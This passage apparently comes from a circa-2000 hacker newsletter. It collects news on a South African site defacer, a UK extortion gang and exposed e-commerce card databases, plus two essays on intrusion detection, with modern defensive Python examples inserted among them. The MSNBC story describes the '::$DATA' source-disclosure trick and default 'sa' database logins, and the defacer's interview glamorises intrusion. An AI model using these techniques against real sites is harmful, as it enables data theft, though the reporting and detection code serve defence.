Last year he telephonically warned companies about computer security. "They weren't interested, especially Eskom, so I defaced their sites to teach them a few tricks."

Also known as "Zilly Zaber" and "Purple Chaos", he is a member of an international hacking gang called the Binary Outlaws.

[Wyzewun: More commonly known as the b1nary 0utlawz or b10z]

"We're against the way governments and big businesses manipulate people. They control information and information shapes people's lives around the world. We've cracked big websites around the world to get this message out."

The 15-member gang, all male, are scattered through Bosnia, New Zealand, The US, Cyprus, Sweden, Ireland and South Africa. Akt0r taught himself the tricks of the trade working in a computer shop, and started hacking at the age of 16 with an Internet group called the North American Intelligence Liberation.

[Wyzewun: They never did a great deal, but cracked an insecure NASA box (Vulnerable to PHF in 1997). They were disbanded when one of the NAiL members mysteriously disappeared after hitting some or other gov thingymabob :( One neat thing they did was...]

"We defaced the Ku Klux Klan web site and replaced it with a picture of Martin Luther King and a message about free speech. They went ballistic."

He is not worried about being caught. "I didn't cover my tracks well. It's quite simple to find me but most companies don't have the knowledge."

He said there was virtually no law in South Africa against "cracking" - what hackers define as breaking into web sites with good and non-destructive intentions.

[Wyzewun: HUH? Whose definition of cracking is THAT?]

"My mom and dad will probably freak. I'm thinking about telling them what I've done," he said.

South African computer security expert Ian Melamed said Akt0r should put his energy into stopping hackers. "We are desperately short of good technical experts in the industry. No right minded person can support the introduction of techno thuggery," he said.
Earlier this week, Richard Miller, general manager of information technology at the Johannesburg Stock Exchange, said investigations were closing in on Akt0r. [Wyzewun: Yeh right, if they haven't got him by now, they won't have him ever, aKt0r knows an infinite amount more than all the JSE "experts"] He denied that any confidential information had been lost. --- End Article --- Well, aKt0r is a good friend - and I respect him, but a lot of his friends don't approve of this new "hacking for a job" mission he's going on. Certainly this can be achieved, but by defacing a site you blow away all your chances of succeeding. He should rather persist at bugging the company day after day, and try and get some form of reaction that way. I originally became aware that aKt0r was doing this when Moe1, part of the Forbidden Knowledge e-zine staff [packetstorm.securify.com/mag/fk] and another member of b10z who helps aKt0r with many of his defacements msg'd me... <Moe1> Oh, btw, I have Nothing to do with aKt0r's latest <Moe1> Some-one needs to talk some sense to that kid Yeah, aKt0r is a pimp and I love him, but this new shit he's up to is just a bit too suicidal. He also told me he intended to stop cracking after the new computer crime laws came in, which it appears he hasn't. He is pushing harder and harder, and attracting too much media attention, and somewhere along the line, something is going to give. We don't need or want a South African Mitnick, and it looks like that could be his eventual path. :/ He is set to do an interview with Carte Blanche in the near future, along with the most prominent members of the South African Hacking scene (Vortexia, Pneuma, Myself and some others). I will have the show put into MPG and will publish a URL for it in HWA.hax0r.news as soon as it is available. Later... @HWA 137.0 ISN: Jan 16:Hacker gang blackmails firms with stolen files ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: ISN mailing list. 
(Subscription list) http://www.the-times.co.uk/news/pages/sti/2000/01/16/stinwenws01028.html?3259223 Hacker gang blackmails firms with stolen files Jon Ungoed-Thomas and Stan Arnaud [The Sunday Times] (12.16.2000) A BRITISH group of hackers has broken into the computer systems of at least 12 multinational companies and stolen confidential files. It has issued ransom demands of up to 10m and is also suspected of hiring out its services. Scotland Yard is now investigating the attacks, which computer experts have described as the most serious systematic breach ever of companies' security in Britain. "The group is using very sophisticated techniques and has been exchanging information via e-mail and internet chat," said an investigator. Visa confirmed last week that it had received a ransom demand last month, believed to have been for 10m. "We were hacked into in mid-July last year," said Russ Yarrow, a company spokesman. "They gained access to some corporate material and we informed both Scotland Yard and the FBI." It is understood the hackers stole computer "source codes" that are critical to programming, and threatened to crash the entire system. If Visa's system crashed for just one day, the company - which handles nearly 1 trillion business a year from customers holding 800m Visa cards - could lose tens of millions of pounds. "We received a phone call and an e-mail to an office in England demanding money," Yarrow said. The company contacted police after the ransom demand. "We hardened the system, we sealed it and they did not return. We have firewalls upon firewalls, but are concerned that anyone got in." Scotland Yard's computer crime unit is now scrutinising e-mail traffic between several known hackers in England and Scotland. Last month officers from the unit flew to Hopeman, a Scottish fishing village, and seized equipment from the home of James Grant, who works for a local computer company. He has been interviewed by detectives and Visa security experts. 
It is understood that he has given a legal undertaking to Visa not to discuss the matter. "He is saying nothing at all," said his mother, Rhona. "That is a situation that will not change in the future." Grant, 20, studied computing in nearby Elgin, and now works for Data Converters, based in Elgin. His father is a member of the civilian security staff at RAF Lossiemouth air base and his mother a care worker. Detectives are studying attacks on at least 12 companies that they believe have been penetrated by the group and others that may be connected, including one within the Virgin group, in which a hacker tried to break into the UK mailing system. They believe the group may also be acting as paid specialists for information brokers who trade corporate secrets. "These are professionals and there is some evidence that suggests some of the activity was contracted and paid for," said a computer expert involved in the investigation. The group's success has exposed flaws in security. The internet company CD Universe last week confirmed it had called in the FBI after being blackmailed by a hacker who had copied more than 300,000 of its customer credit card files. Scotland Yard said: "There is an ongoing investigation into the incident involving Visa, but it is too early to speculate about the involvement of a group." ISN is sponsored by Security-Focus.COM @HWA 138.0 How to steal 2,500 credit cards ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Dragos Ruiu http://www.zdnet.co.uk/news/2000/2/ns-12672.html How to steal 2,500 credit cards Mon, 17 Jan 2000 10:19:05 GMT Bob Sullivan, MSNBC Remarkable discovery by MSNBC investigation, uncovers e-commerce sites' shoddy security. Just how easy is it to steal credit card numbers on the Internet? Last week, MSNBC was able to view nearly 2,500 credit card numbers stored by seven small e-commerce Web sites within a few minutes, using elementary instructions provided by a source. 
In all cases, a list of customers and all their personal information was connected to the Internet and either was not password-protected or the password was viewable directly from the Web site. Credit card theft, a problem long lurking in the background of Internet commerce, leaped to the top of consumers' minds earlier this month when a computer intruder calling himself Maxus was able to break into CD Universe's database of user credit cards. There's still speculation about how he did it. But perhaps Maxus didn't have to work so hard. Last week, MSNBC was able to view nearly 2,500 credit card numbers and other data essentially by browsing e-commerce Web sites using a commercially available database tool rather than a Web browser. Not only were the sites storing the credit cards in plain text in a database connected to the Web -- the databases were using the default user name and in some cases, no password. These basic security flaws were found by a legitimate Russian software company named Strategy LLC, according to CEO Anatoliy Prokhorov, and shared with MSNBC. He says he tried contacting some of the companies first and got no response. "From our point of view this is just unprofessionalism in a very high degree that's not explainable," Prokhorov said. His company writes software that helps consumers compare prices across multiple e-commerce sites, so his developers become familiar with data structures at hundreds of e-commerce sites. He says they weren't looking to find security flaws, but rather stumbled on these. "This is just a hole we passed by, an open door. Our people were amazed." But security experts were not. Given the speed required to succeed in the fast-paced Internet economy, companies are in a big hurry to publish working Web sites and often skimp on security measures. "This is a microcosm of what's out there," said Elias Levy of SecurityFocus.com. Levy's site was the first to report the CD Universe break-in last weekend. 
"One could only imagine what they would have found if they were looking for problems ... The problem is fairly widespread, and what Anatoliy has found is a small snapshot." Prokhorov also contacted SecurityFocus.com with his information, and the site today will issue its own report based on its independent investigation. The security flaws Prokhorov found involve more than just easy-to-steal credit cards. At all seven sites, MSNBC was able to view a wide selection of personal data including billing addresses, phone numbers and in some cases, employee Social Security numbers. Prokhorov sent the list and instructions to MSNBC on Tuesday. It included about 20 Web sites which either had no password protection at all on their database servers -- in each case, they were running Microsoft's SQL Server software -- or had password information exposed on their Web site. Connecting to all the sites was as simple as starting SQL Server and opening a connection to the Web site. (Note: Microsoft is a partner in MSNBC.) Some of the sites didn't include personal information; they are not included in this report. The others -- PMIWeb.com, Softwarecloseouts.com, EPCdeals.com, Expressmicro.com, Computerparts.com, Directmicro.com and Sharelogic.net -- were all contacted 24 hours before this story so they could close the security hole. While the flaws are obvious, assessing blame is a much more sticky business. There's a mounting concern that small businesses are particularly vulnerable to attack; many don't have computer experts on staff. Other times, non-technically savvy business owners take lowball bids from developers who promise a secure Web site but don't deliver. Then there are inherent problems in software itself that make flaws more likely. In some cases, the server-side code underlying a Web page is viewable if a browser places "::$DATA" at the end of the page's Web address. 
That code, normally hidden, can contain any usernames, passwords and other information about any computer connected to that server. This flaw was revealed over two years ago and has since been patched. Four of the vulnerable sites MSNBC found were hosted on the same Web server and had not plugged this hole. But even without knowing that technique, an intruder could have entered the sites anyway -- the username required for entering the database was the default "sa," which stands for "system administrator"; the password was the name of the company. "We used a developer, and obviously the developer didn't take that flaw into consideration," said a spokesperson for the sites. "The flaw could have lied within the software, but maybe the developer should have taken that into consideration ... and one thing we didn't do, we didn't hire a security company to come in and test our Web site." Getting a second opinion when building an e-commerce site is a good idea, said security expert Russ Cooper, who maintains the popular NTBugTraq mailing list. "Make a condition of the contract that it has to pass scrutiny of another individual who tests the site," Cooper recommended. The fundamental problem, he said, is that developers have no liability for flaws they leave behind in e-commerce sites. Merchants are responsible for the cost of any stolen merchandise, while most developer contracts make clear they are not responsible for what happens with a site they build. "So a lot of people end up with a working site but not a secure site." The other three vulnerable sites MSNBC visited simply used "sa" as the username for their database, and no password. Average consumers have no way of knowing how well-guarded their personal information is when they submit it to a Web site. Levy said the problems MSNBC found at these seven sites are hardly isolated. "The blame falls on more than one person. 
You can't rush out to set up an e-commerce site regardless of how much you want to make money... Many people don't give (security) a second thought," he said. One of the fundamental flaws in all these sites -- and, experts say, in many other sites -- is the storing of private consumer information in the first place. While encryption techniques that scramble the data are available, it's often kept on a computer in plain text -- one step away from the Internet. While that's more convenient, experts agree it's a bad idea. "My advice is, if nothing else, don't store the data where it physically has access to the Web," said Wesley Wilhelm, a fraud prevention consultant at the Internet Fraud Prevention Advisory Council. "Take them off every night and make a sneakernet run." As for consumers, there isn't much they can do to ascertain how well a Web site is guarding their personal information. Some experts suggest using only one card online, and religiously checking credit card bills. While consumers are liable for at most $50 of fraudulent purchases, they are responsible for catching them and alerting their bank. MSNBC's Curtis Von Veh contributed to this story. @HWA 139.0 Good IDS article from Security Portal ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Dragos Ruiu http://securityportal.com/closet/closet20000112.html Kurt Seifried, seifried@securityportal.com, for http://www.securityportal.com/ January 12, 2000 - Last week I did a general overview of IDS systems and anti-virus software, and why they may not be the answer. Well in some respects they aren't and in some they are. But I think the main issue is the current model of intrusion detection (be it host or network based, looking for bad packets or data in the case of anti-virus software) is flawed (and the alternatives have a ways to go). Now to back up that statement so I don't get flame roasted. 
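The two flaws the story describes, a database reachable from the Internet with the default "sa" login and a blank or guessable password, and card numbers sitting in the clear in that database, are both things a reviewer can check for before a site goes live. The following is an added example, not code from MSNBC, Strategy LLC or any of the sites named; the connection strings, company name and order rows are constructed sample data (the card numbers are the well-known test numbers, not real accounts), and the "password equals company name" rule follows the article's description of what was found.

```python
"""Added example (not from the MSNBC story or any of the sites it names):
two checks for the flaws the article describes, run over constructed
sample data. Connection strings, company name and rows are made up."""
import re

COMPANY_NAME = "Acme Micro"  # constructed; the article says passwords equalled the company name

# Constructed connection strings of the kind found in a site's server-side code.
CONNECTION_STRINGS = [
    "Provider=SQLOLEDB;Data Source=db.example.test;Initial Catalog=shop;User ID=sa;Password=",
    "Driver={SQL Server};Server=db.example.test;Database=shop;UID=sa;PWD=Acme Micro",
    "Driver={SQL Server};Server=db.example.test;Database=shop;UID=shop_app;PWD=c0rr3ct-h0rse-b4ttery",
]

# Constructed rows from an orders table; the card numbers are the well-known test
# numbers 4111111111111111 and 5500000000000004, not real accounts.
ORDER_ROWS = [
    {"order_id": "1234567890123", "phone": "212-555-0100", "card": "4111111111111111"},
    {"order_id": "1234567890124", "phone": "212-555-0101", "card": "ENC:9f2a..."},
    {"order_id": "1234567890125", "phone": "212-555-0102", "card": "5500000000000004"},
]


def parse_conn_string(conn):
    """Split a 'key=value;key=value' string into a dict with upper-cased keys."""
    parts = {}
    for chunk in conn.split(";"):
        if "=" in chunk:
            key, value = chunk.split("=", 1)
            parts[key.strip().upper()] = value.strip()
    return parts


def audit_conn_string(conn, company_name=COMPANY_NAME):
    """Return the weaknesses the article describes: default 'sa' login, blank
    password, or a password that is just the company name."""
    parts = parse_conn_string(conn)
    user = parts.get("UID", parts.get("USER ID", ""))
    password = parts.get("PWD", parts.get("PASSWORD", ""))
    findings = []
    if user.lower() == "sa":
        findings.append("uses the default 'sa' login")
    if password == "":
        findings.append("blank password")
    elif password.lower().replace(" ", "") == company_name.lower().replace(" ", ""):
        findings.append("password is the company name")
    return findings


def luhn_ok(digits):
    """Luhn check digit test used by payment card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


PAN_RE = re.compile(r"\b\d{13,19}\b")  # card-length digit runs; real scanners also handle separators


def find_plaintext_pans(rows):
    """Return (row index, column, masked number) for every cell holding a
    Luhn-valid card number in the clear. Encrypted or tokenised values and
    ordinary order numbers do not pass the check."""
    hits = []
    for index, row in enumerate(rows):
        for column, value in row.items():
            for candidate in PAN_RE.findall(str(value)):
                if luhn_ok(candidate):
                    hits.append((index, column, "*" * (len(candidate) - 4) + candidate[-4:]))
    return hits


def run_audit(conn_strings=CONNECTION_STRINGS, rows=ORDER_ROWS):
    """Bundle both checks; returns a report dict rather than printing."""
    return {
        "connection_strings": {c: audit_conn_string(c) for c in conn_strings},
        "plaintext_cards": find_plaintext_pans(rows),
    }


if __name__ == "__main__":
    report = run_audit()
    for conn, findings in report["connection_strings"].items():
        print(conn.split(";")[0], "->", findings or "ok")
    for hit in report["plaintext_cards"]:
        print("plaintext card in row %d column %s: %s" % hit)
```

The Luhn pass is what separates a real card number from an order number or phone number of similar length; anything that hits is stored in the clear, which is the article's point about keeping such data off a web-connected database in the first place.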
Problem 1) Basic performance problems (machine): Let's take a system like Network Flight Recorder for example (and don't get me wrong, as current NIDS systems go, NFR is one of the best on the market), NFR hoovers up all the traffic and can log it and compare it against a set of rules (modules actually) to see if any matches known attacks. NFR can also have multiple detection units that report to a central authority, so you can detect scans more reliably. So like most people you have a pretty diverse network, some Solaris, some Cisco, some NT, and so on and so forth. If you want to detect as many attacks as possible, you need to load all the modules available, resulting in slower performance, because NFR is literally doing more stuff. This will also result in the highest number of false positives, which will require you to spend a lot of time "filtering" manually. You can of course reduce the number of modules you need by not loading the ones that detect NetWare specific attacks for example, the assumption being you have no NetWare servers, or at least none accessible to the Internet. This can be a problem because at some point you might attach a NetWare server to the network in say your Internet DMZ, or (accidentally or otherwise) make an existing internal NetWare server visible to the Internet. The other, related problem, is that you might not load modules to detect attacks on Radius servers (same assumption as the NetWare servers apply here), which you might regret at some later point, very close to this is the idea of removing modules for old attacks, that you have patched all your applicable servers for. The problem basically boils down to the fact that networks have a habit of changing, rather quickly, and new services, new operating systems, and old bugs have a way of getting in without the correct people being notified. 
To ensure you don't miss anything (as the NFR admin), regular port sweeps using tools like nmap would be required to make sure new machines don't pop up, or new services, this technique of course is not infallible. Problem 2) Basic performance problems (man): The man hours required to properly maintain and respond to an (N)IDS system vary, most of it depends on how much traffic you monitor, and how often you get attacked (so generally speaking bigger sites, higher profile sites, and the like will generate more work). I also don't know about you, but I don't want to spend 8 hours a day staring at packet logs, trying to figure out what is hostile and what isn't (and then responding to it). Even if all goes well and you detect an attack successfully, the most you can do about it is to firewall the perpetrator, and contact their network administrator, chances are the attack was spoofed, or launched from a compromised machine (even if 99% of hosts on the Internet are secure, that still leaves around 1 million that aren't by today's numbers). Unlike the physical world, where most people (criminals being a subset of people) can't afford to hop on a jet plane, scoot over to Australia, rattle a few doorknobs in the hopes that one is open and rob the place, the Internet allows just that. The problem of "false positives" is made worse by the number of low level attackers (known as "script kiddies") seems to be increasing, largely due to the propensity of free UNIX platforms (*BSD, Linux), hacking tools (Bugtraq, rootshell), and Internet access (especially high speed access like ADSL and cable). This will only continue for the foreseeable future, I don't know when or where it will level off (or start to decline for that matter) but I don't think it will be anytime soon. 
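The port-sweep habit mentioned above only pays off if someone compares this week's sweep against last week's. The following is an added example, not part of the article or of NFR, that diffs two nmap greppable (-oG) outputs and reports hosts and listening services that appeared or vanished; both scan outputs are constructed samples, chosen so that a RADIUS listener and a NetWare box (port 524, ncp) show up, the two cases the article uses.

```python
"""Added example (not from the article): diff two nmap greppable (-oG)
sweeps to spot hosts and services that appeared since the last one.
Both scan outputs below are constructed samples, not real scan results."""

# Constructed: last week's sweep of the DMZ.
BASELINE_SCAN = "\n".join([
    "# Nmap scan initiated (constructed sample)",
    "Host: 10.0.0.5 (web1.example.test)\tStatus: Up",
    "Host: 10.0.0.5 (web1.example.test)\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, "
    "443/filtered/tcp//https///\tIgnored State: closed (997)",
    "Host: 10.0.0.9 (mail.example.test)\tStatus: Up",
    "Host: 10.0.0.9 (mail.example.test)\tPorts: 25/open/tcp//smtp///, 110/open/tcp//pop3///"
    "\tIgnored State: closed (998)",
])

# Constructed: this week's sweep. A RADIUS listener and a NetWare box have appeared,
# and the POP3 service on the mail relay is gone.
CURRENT_SCAN = "\n".join([
    "# Nmap scan initiated (constructed sample)",
    "Host: 10.0.0.5 (web1.example.test)\tStatus: Up",
    "Host: 10.0.0.5 (web1.example.test)\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, "
    "443/filtered/tcp//https///, 1812/open/udp//radius///\tIgnored State: closed (996)",
    "Host: 10.0.0.9 (mail.example.test)\tStatus: Up",
    "Host: 10.0.0.9 (mail.example.test)\tPorts: 25/open/tcp//smtp///\tIgnored State: closed (999)",
    "Host: 10.0.0.23 (nw1.example.test)\tStatus: Up",
    "Host: 10.0.0.23 (nw1.example.test)\tPorts: 524/open/tcp//ncp///\tIgnored State: closed (999)",
])


def parse_grepable(text):
    """Return {ip: {(port, proto, service), ...}} for open ports in -oG output.
    Each port entry has the form port/state/proto/owner/service/rpcinfo/version/."""
    inventory = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "\tPorts:" not in line:
            continue
        ip = line.split()[1]
        ports_field = line.split("\tPorts:", 1)[1].split("\t", 1)[0]
        open_ports = inventory.setdefault(ip, set())
        for entry in ports_field.split(","):
            fields = entry.strip().split("/")
            if len(fields) >= 5 and fields[1] == "open":
                open_ports.add((int(fields[0]), fields[2], fields[4]))
    return inventory


def diff_inventory(baseline, current):
    """Report what changed between two sweeps. New hosts are listed whole; for
    hosts present in both, list services that appeared or disappeared."""
    changes = {"new_hosts": [], "gone_hosts": [], "new_services": [], "gone_services": []}
    for ip in sorted(current):
        if ip not in baseline:
            changes["new_hosts"].append(ip)
            continue
        for port in sorted(current[ip] - baseline[ip]):
            changes["new_services"].append((ip,) + port)
        for port in sorted(baseline[ip] - current[ip]):
            changes["gone_services"].append((ip,) + port)
    changes["gone_hosts"] = sorted(ip for ip in baseline if ip not in current)
    return changes


def sweep_diff(baseline_text=BASELINE_SCAN, current_text=CURRENT_SCAN):
    """Parse both sweeps and return the change report."""
    return diff_inventory(parse_grepable(baseline_text), parse_grepable(current_text))


if __name__ == "__main__":
    for kind, items in sweep_diff().items():
        for item in items:
            print(kind, item)
```

Anything in new_hosts or new_services is a cue to load the matching detection modules (or to ask why the service exists at all); gone_services is worth a glance too, since a service that silently disappeared is sometimes a box that was rebuilt.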
Problem 3) The intelligence solutions (beyond man and machine):

So if machines can't do the job too well (separating the wheat from the chaff), and humans are too expensive, the obvious alternative (well maybe not obvious) is to get the machines to behave more like people (or living organisms at all for that matter). The immune system is an amazing piece of work. With only rudimentary "intelligence" it manages to keep you relatively safe from known threats, but even more interestingly, it manages to adapt quickly to new threats (it doesn't always work perfectly, AIDS for example seems to be able to avoid the immune system by disabling it). So why not build a piece of software that emulates this, and use it to detect attacks?

Well this is exactly what some people have been working on (in other fields as well, such as anti-virus software). One such result (from the Computer Immune Systems project at the University of New Mexico) is stide, which runs on several UNIX platforms and is available for free. Each TCP connection (IP from, IP to, port to: 80 bits of information in all) is represented by a compressed 49-bit string. Speaking in simplified terms, stide monitors the network and builds a list of ok traffic (known as "self"), and as these connections are seen more often they "mature". Once stide has a good picture of "self" it can compare all traffic (in the form of the 49-bit identifier) against its "self" (the known good traffic), and decide whether or not it is legitimate. Now this wouldn't work too well as it stands, since only the people that connected during the time you spent monitoring your webserver would be allowed in the future, so stide does not match the entire string; rather it only requires 12 of the 49 bits to match.

This sounds promising, but the real kicker is that in their tests stide did a remarkably good job of identifying attempted intrusions, and more importantly the number of false positives was relatively low (compared to traditional (N)IDS systems). So what's the catch to stide? Well, it seems it requires a large amount of CPU time and doesn't scale terribly well, but this may not be an incredibly large problem. By installing the stide software on all hosts the load is distributed (each host only monitors its own traffic), and generally speaking most hosts do not communicate with too many other hosts, or in the case of servers tend to communicate with only a few protocols (such as ftp), making the list of "self" relatively short. This also eliminates the single point of failure possible with current (N)IDS systems, but more importantly, assuming software packages like stide mature and actually are viable, each machine (metaphorically speaking) will take care of itself, and require a minimum of human intervention.

The future?

In any case there are other organizations working on similar solutions to similar problems, the most notable being IBM. IBM is developing an anti-virus system where computers running the software will identify potentially dangerous pieces of software and send them to a central site to be analyzed; if it turns out to be a virus the system will be able to generate a countermeasure for it (typically a virus signature and a removal process) and distribute it to all the machines running this software. This solves all the major current problems with anti-virus software (that I covered on the 5th of Jan, 2000), and makes for a much more effective response (of course the virus writers might start attacking the central site(s) in order to help their new viruses spread). This system won't be available for several years most likely, but as various pieces of it come online, network administrators (with the money to afford it) will benefit.
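The "self" model described above (a 49-bit string per connection, matured by repetition, matched on 12 contiguous bits rather than the whole string) is short enough to show end to end. The following is an added example, not the University of New Mexico project's code: it packs (local host, remote host, service port) into 49 bits, keeps a count per string so that only repeated connections mature into "self", and classifies a new connection as self if it agrees with any matured string on 12 consecutive bit positions. The bit layout (8 bits of local host, 32 bits of remote address, 9 bits of port bucket), the maturity threshold and the training traffic are this example's own assumptions.

```python
"""Added example (not the UNM project's code): the 'self' model the article
describes, simplified. Connections are packed into a 49-bit string and a new
connection counts as 'self' if it agrees with a matured self string on at
least r contiguous bits (r = 12, as in the article). The bit layout, the
maturity threshold and the traffic below are this example's assumptions."""
import ipaddress

R_CONTIGUOUS = 12  # "only requires 12 of the 49 bits to match"
MATURITY = 2       # times a connection must be seen before it counts as self (assumption)


def encode_connection(local_ip, remote_ip, remote_port):
    """Compress (local host, remote host, service port) into 49 bits.
    Layout (assumption): 8 bits low octet of the local host (one internal /24),
    32 bits remote IPv4 address, 9 bits service port with ports >= 511 in one bucket."""
    local = int(ipaddress.IPv4Address(local_ip)) & 0xFF
    remote = int(ipaddress.IPv4Address(remote_ip))
    port = min(remote_port, 511)
    return f"{local:08b}{remote:032b}{port:09b}"


def r_contiguous_match(a, b, r=R_CONTIGUOUS):
    """True if the two equal-length bit strings agree on r consecutive positions."""
    run = 0
    for x, y in zip(a, b):
        run = run + 1 if x == y else 0
        if run >= r:
            return True
    return False


class SelfModel:
    def __init__(self, r=R_CONTIGUOUS, maturity=MATURITY):
        self.r = r
        self.maturity = maturity
        self.seen = {}  # 49-bit string -> number of times observed

    def observe(self, local_ip, remote_ip, remote_port):
        key = encode_connection(local_ip, remote_ip, remote_port)
        self.seen[key] = self.seen.get(key, 0) + 1

    def mature_self(self):
        """Only connections seen often enough 'mature' into the self set."""
        return [s for s, n in self.seen.items() if n >= self.maturity]

    def is_self(self, local_ip, remote_ip, remote_port):
        probe = encode_connection(local_ip, remote_ip, remote_port)
        return any(r_contiguous_match(probe, s, self.r) for s in self.mature_self())


# Constructed training traffic: web server 10.0.0.5 talks to a few 192.0.2.x
# hosts, the mail relay 10.0.0.9 to one SMTP peer, plus one one-off connection
# that is seen once and therefore never matures.
TRAINING = (
    [("10.0.0.5", "192.0.2.10", 80)] * 3
    + [("10.0.0.5", "192.0.2.11", 80)] * 2
    + [("10.0.0.5", "192.0.2.44", 443)] * 2
    + [("10.0.0.9", "198.51.100.25", 25)] * 4
    + [("10.0.0.5", "203.45.113.7", 31337)]
)


def build_model(training=TRAINING):
    model = SelfModel()
    for conn in training:
        model.observe(*conn)
    return model


def classify(model, connections):
    """Label each (local, remote, port) triple as 'self' or 'nonself'."""
    return [(conn, "self" if model.is_self(*conn) else "nonself") for conn in connections]


if __name__ == "__main__":
    model = build_model()
    # A new 192.0.2.x client to the web server shares 32 contiguous bits with a
    # matured string, so it is self; the probe from 10.0.0.200 shares at most 5.
    for conn, label in classify(model, [("10.0.0.5", "192.0.2.99", 80),
                                        ("10.0.0.200", "203.45.113.7", 31337)]):
        print(conn, label)
```

Two things the run makes visible: a never-seen client in a familiar remote network is accepted because the shared address prefix alone supplies the 12 bits, which is the generalisation the article is after, and the one-off connection in the training data never becomes self, so a later connection that resembles it is still flagged.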
Kurt Seifried (seifried@securityportal.com) is a security analyst and the author of the "Linux Administrators Security Guide", a source of natural fiber and Linux security, part of a complete breakfast.

--kyx----kyx----kyx----kyx----kyx----kyx----kyx----kyx----kyx----kyx----kyx----kyx----kyx----kyx--

And the previous week's article that it referred to:

--kyx----kyx----kyx----kyx----kyx----kyx----kyx----kyx----kyx----kyx----kyx----kyx----kyx----kyx--

Network Intrusion Detection Systems and Virus Scanners - are they the answer?

Kurt Seifried, seifried@seifried.org, for http://www.securityportal.com/

January 5, 2000 - It takes a lot less effort to destroy and break things than it takes to build and fix them. This is nowhere more evident than in computer networks. Corporations, governments, universities and other organizations spend large sums of money on computer network infrastructure, and the cost of keeping them running is not trivial. And this doesn't even take into consideration malicious attacks and security controls, which add even more cost to building and maintaining a network of computers.

Unfortunately for most of us, the desktop is Microsoft centric, which means most of us can't do a whole lot to it to make it more secure. If you run Windows 95 or 98 you get no file permissions (and hence the computer has absolutely minimal protection from hostile acts); if you run Windows NT 4.0 Server or Workstation the default settings are full control for everyone for all files on the system, and registry keys (fixing this takes a long time, and will break some applications). Let's assume for a minute you have fully locked down the machines, users cannot modify them, they are physically secure, and so on. Are you secure? No. New problems for various operating systems are made public all the time; these range from minor security issues to full blown "take control of the machine remotely and do what you want with it".

Also, due to the single user oriented nature of Windows there exists a whole class of malicious software called viruses, which typically consist of some code to exploit a program or system bug, a replication mechanism, and possibly some additional software that ranges from annoying to destructive. What are network and systems administrators to do in such an increasingly hostile world?

Anti-virus software

Entire classes of software with literally hundreds (ok, maybe not hundreds but a lot) of companies producing products have sprung up over the last few years, and the field is now beginning to consolidate into several large companies providing complete product lines to cover everything you could want, and dozens of medium to small sized companies with sometimes just one main product. Of these the anti-virus software vendors were one of the original groups of vendors to start writing add-on software to enhance the security (which was non-existent on Microsoft platforms at the time) available for ensuring software that you used was not malicious. This has led to an "arms race" (apologies for using this but it is a decent analogy) between virus software writers and anti-virus vendors.

Most anti-virus software packages started out as simple programs that checked the files against a known list of "bad" ones (i.e. via checksum and so forth), which led to polymorphic viruses (that is, the software would modify itself a little bit each time, thus defeating this detection technique). The anti-virus vendors then started scanning the actual binary code for the various pieces of code present in viruses, and heuristic packages that supposedly figure out what the software will do, and based on that can block it if it is considered malicious (if this worked properly though we wouldn't be needing any more virus signature updates now would we?). Additionally things have gotten more complicated, with the integration of anti-virus software with such services as email, www and ftp.
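The progression just described, whole-file checksums defeated by any change to the file, byte signatures defeated by encoding the body, and the normalisation a scanner then needs, can be shown on a harmless sample. The following is an added example, not from the article or from any anti-virus product: the "virus" is a constructed marker string, the packer is single-byte XOR of the body behind a made-up stub (the XOR evasion the article goes on to list), and the third scanner brute-forces the 255 possible keys before matching. The signature, sample and key are all assumptions of this example.

```python
"""Added example (not from the article): the three detection generations the
text describes, checksum, byte signature and a normalising scan, run against a
harmless constructed sample, a one-byte variant and an XOR-'packed' copy.
Nothing here is real malware; the marker string is made up."""
import hashlib

# Constructed stand-in for a known-bad code fragment.
SIGNATURE_DB = {"demo.marker": b"\x4d\x5a\x90\x00DEMO-MARKER-NOT-MALWARE"}

SAMPLE = b"constructed header " + SIGNATURE_DB["demo.marker"] + b" constructed trailer"
VARIANT = SAMPLE + b"\x90"            # one appended byte: a trivial 'polymorphic' change
KNOWN_HASHES = {hashlib.sha256(SAMPLE).hexdigest(): "demo.marker"}


def scan_by_hash(blob, known=KNOWN_HASHES):
    """First generation: whole-file checksum. Any change to the file defeats it."""
    name = known.get(hashlib.sha256(blob).hexdigest())
    return [name] if name else []


def scan_by_signature(blob, sigs=SIGNATURE_DB):
    """Second generation: look for a known byte sequence anywhere in the file."""
    return [name for name, sig in sigs.items() if sig in blob]


def xor_pack(payload, key):
    """Single-byte XOR 'packing' like the evasion the article lists. A real
    packer prepends a decoder stub; here a constructed marker stands in for it."""
    return b"UNPACK:" + bytes([key]) + bytes(b ^ key for b in payload)


def scan_with_unpacking(blob, sigs=SIGNATURE_DB):
    """Third step: normalise before matching. Try the plain scan, then all 255
    single-byte XOR keys; a decoded body that contains a signature is a hit."""
    hits = scan_by_signature(blob, sigs)
    if hits:
        return hits
    for key in range(1, 256):
        decoded = bytes(b ^ key for b in blob)
        hits = scan_by_signature(decoded, sigs)
        if hits:
            return [f"{name} (xor key 0x{key:02x})" for name in hits]
    return []


PACKED = xor_pack(SAMPLE, 0x5A)


def compare_scanners(blob):
    """Run all three scanners on one file and return their verdicts side by side."""
    return {
        "hash": scan_by_hash(blob),
        "signature": scan_by_signature(blob),
        "unpacking": scan_with_unpacking(blob),
    }


if __name__ == "__main__":
    for label, blob in [("sample", SAMPLE), ("variant", VARIANT), ("packed", PACKED)]:
        print(label, compare_scanners(blob))
```

The variant shows why checksum lists gave way to signatures (one extra byte and the hash is useless, the signature still hits), and the packed copy shows the next step of the same race: the raw signature scan sees nothing, and only a scanner that undoes the encoding first gets the detection back. Re-packing with a different key each time changes the file again but not the decoded body, so the brute-force scan still catches it.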
